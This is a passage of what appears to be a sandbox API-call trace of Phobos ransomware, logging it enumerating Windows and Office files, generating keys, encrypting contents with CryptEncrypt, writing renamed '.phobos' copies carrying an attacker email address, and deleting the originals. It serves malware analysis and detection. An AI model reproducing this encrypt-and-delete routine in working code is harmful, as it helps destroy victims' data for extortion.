lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.578] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=148320) returned 1 [0122.578] CloseHandle (hObject=0x33c) returned 1 [0122.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll")) returned 0x2020 [0122.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.578] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.579] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1117024) returned 1 [0122.579] CloseHandle (hObject=0x33c) returned 1 [0122.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll")) returned 0x2020 [0122.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.579] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.579] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.579] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.580] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=145760) returned 1 [0122.580] CloseHandle (hObject=0x33c) returned 1 [0122.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll")) returned 0x2020 [0122.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.580] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.580] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1206112) returned 1 [0122.580] CloseHandle (hObject=0x33c) returned 1 [0122.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll")) returned 0x2020 [0122.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.581] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.581] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=14688) returned 1 [0122.581] CloseHandle (hObject=0x33c) returned 1 [0122.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll")) returned 0x2020 [0122.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.581] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.581] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=282624) returned 1 [0122.581] CloseHandle (hObject=0x33c) returned 1 [0122.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf")) returned 0x2020 [0122.582] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0122.582] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0122.582] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b6fc78 | out: lpNewFilePointer=0x0) returned 1 [0122.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.586] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc8c | out: phKey=0x3b6fc8c*=0x29c460) returned 1 [0122.586] CryptSetKeyParam (hKey=0x29c460, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0122.586] ReadFile (in: hFile=0x33c, lpBuffer=0x4190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x3b6fcb4, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesRead=0x3b6fcb4*=0x45000, lpOverlapped=0x0) returned 1 [0122.724] CryptEncrypt (in: hKey=0x29c460, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x45010, dwBufLen=0x45010 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x45010) returned 1 [0122.727] WriteFile (in: hFile=0x340, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x45010, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x45010, lpOverlapped=0x0) returned 1 [0122.757] CryptImportKey (in: hProv=0x254d70, pbData=0x3b6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x3b6fc90 | out: phKey=0x3b6fc90*=0x29c420) returned 1 [0122.757] CryptSetKeyParam (hKey=0x29c420, dwParam=0x1, pbData=0x3b6fd38, dwFlags=0x0) returned 1 [0122.757] CryptEncrypt (in: hKey=0x29c420, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50, dwBufLen=0x50 | out: pbData=0x4190020*, pdwDataLen=0x3b6fc50*=0x50) returned 1 [0122.757] CryptDestroyKey (hKey=0x29c420) returned 1 [0122.757] WriteFile (in: hFile=0x340, lpBuffer=0x4190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x3b6fc98, lpOverlapped=0x0 | out: lpBuffer=0x4190020*, lpNumberOfBytesWritten=0x3b6fc98*=0x102, lpOverlapped=0x0) returned 1 [0122.757] CryptDestroyKey (hKey=0x29c460) returned 1 [0122.757] CloseHandle (hObject=0x33c) returned 1 [0122.757] CloseHandle (hObject=0x340) returned 1 [0122.762] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf")) returned 1 [0122.765] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.792] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1268) returned 1 [0122.792] CloseHandle (hObject=0x340) returned 1 [0122.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk")) returned 0x20 [0122.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.792] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\Memory Diagnostics Tool.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\administrative tools\\memory diagnostics tool.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.792] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.792] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.792] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1304) returned 1 [0122.793] CloseHandle (hObject=0x340) returned 1 [0122.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk")) returned 0x20 [0122.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.793] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.793] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.793] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1248) returned 1 [0122.793] CloseHandle (hObject=0x340) returned 1 [0122.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk")) returned 0x20 [0122.794] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.794] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0122.794] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1212) returned 1 [0122.794] CloseHandle (hObject=0x340) returned 1 [0122.794] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk")) returned 0x20 [0122.794] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.794] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.795] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.795] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.895] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1345) returned 1 [0122.895] CloseHandle (hObject=0x330) returned 1 [0122.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk")) returned 0x20 [0122.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.896] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.896] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.896] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0122.906] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2951) returned 1 [0122.906] CloseHandle (hObject=0x330) returned 1 [0122.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk")) returned 0x20 [0122.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.907] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.916] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.916] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0122.970] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2917) returned 1 [0122.970] CloseHandle (hObject=0x2b8) returned 1 [0122.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk")) returned 0x20 [0122.970] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.970] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.970] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.971] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0122.971] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2751) returned 1 [0122.971] CloseHandle (hObject=0x2b8) returned 1 [0122.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk")) returned 0x20 [0122.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 